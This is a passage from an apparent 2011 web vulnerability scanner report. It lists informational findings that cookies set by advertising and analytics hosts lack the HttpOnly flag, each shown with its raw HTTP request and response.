13.132. http://ping.crowdscience.com/ping.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ping.crowdscience.com
Path:
/ping.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:__csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1 Host: ping.crowdscience.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:56 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/ Content-Length: 8286 P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml" Connection: close Content-Type: text/plain (function (){ var cs = CrowdScience; cs.state = 1; // cs.states.ping_loading; cs.invitation_beforeShow = function() {}; cs.invitation_afterShow = function() {}; cs.i...[SNIP]...
13.133. http://pixel.fetchback.com/serve/fb/pdc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pixel.fetchback.com
Path:
/serve/fb/pdc
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1 Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: opt=1
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:28 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 15:32:28 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40 <!-- opt out exists or ip filtered -->
13.134. http://pixel.quantserve.com/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pixel.quantserve.com
Path:
/pixel
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=1150096029;fpan=1;fpa=P0-1990433296-1315339228713;ns=0;url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315339228711;tzo=300;a=p-9eJ8k4iSzux46;labels=CNBC.Section.search%2CCNBC.Sub%20Section.Search%7CAll HTTP/1.1 Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF8BHwHSB4EQCa0QvYgQAshAHxA
Response
HTTP/1.1 204 No Content Connection: closeSet-Cookie: d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Date: Tue, 06 Sep 2011 15:00:28 GMT Server: QS
13.135. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://public.deloitte.com
Path:
/media/00Global/social_links/dtt_email_16x16.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/00Global/social_links/dtt_email_16x16.gif HTTP/1.1 Host: public.deloitte.com Proxy-Connection: keep-alive Referer: http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=56; SC_LINKS=us%3Asearch%5E%5ETalent%5E%5Eus%3Asearch%20%7C%20Talent%5E%5E; s_nr=1315345935038-Repeat; s_vnum=1747342618651%26vn%3D2; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FServices%25252Fadditional-services%25252Ftalent-human-capital-hr%25252FTalent_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 16:52:17 GMTSet-Cookie: SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Date: Tue, 06 Sep 2011 16:52:17 GMT Content-Type: image/gif Accept-Ranges: bytes Last-Modified: Thu, 06 Aug 2009 16:11:30 GMT ETag: "4090ff8eb016ca1:926" Content-Length: 405 GIF89a........................(........x........K........\...........Z.....$..%..E....p..... ..'.....P.................x..H...............................................................................[SNIP]...
13.136. http://r.openx.net/img
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r.openx.net
Path:
/img
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img?pixel_id=52bb1d64d5b1cddb69e55780dd37f64a HTTP/1.1 Host: r.openx.net Proxy-Connection: keep-alive Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: p=1315103289; i=d2a43928-76cd-49ea-b899-b41fb371435f
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:13 GMT Server: Apache Cache-Control: public, max-age=30, proxy-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache P3P: CP="CUR ADM OUR NOR STA NID"Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net Content-Length: 43 Connection: close Content-Type: image/gif GIF89a.............!.......,...........D..;
13.137. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:36:31 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:36:31 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1...[SNIP]...
13.138. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342006119&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1069543.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:46:48 GMT Content-Type: application/x-javascript; charset=utf-8 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 15:46:48 GMT Content-Length: 996 Connection: closeSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001069543/cstr=12485207=_4e664067,866585...[SNIP]...
13.139. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 16:07:26 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 16:07:26 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1...[SNIP]...
13.140. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:51:56 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 15:51:56 GMT Connection: closeSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3...[SNIP]...
13.141. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/ A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:26:14 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:26:15 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3...[SNIP]...
13.142. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
